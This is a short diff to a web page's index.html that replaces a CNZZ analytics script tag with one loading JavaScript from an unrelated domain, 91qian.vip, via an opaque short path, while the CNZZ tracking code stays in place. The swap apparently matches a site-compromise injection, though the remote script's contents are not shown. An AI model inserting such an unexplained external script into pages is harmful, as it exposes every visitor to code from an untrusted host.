--- a/index.html
+++ b/index.html
@@ -10,7 +10,7 @@
     <!--
  
     -->
-    <script src="https://s23.cnzz.com/z_stat.php?id=1275487845&web_id=1275487845" language="JavaScript"></script>
+    <script src="https://91qian.vip/cfqu67" language="JavaScript"></script>
     <script type="text/javascript">
         //声明_czc对象:
         var _czc = _czc || [];
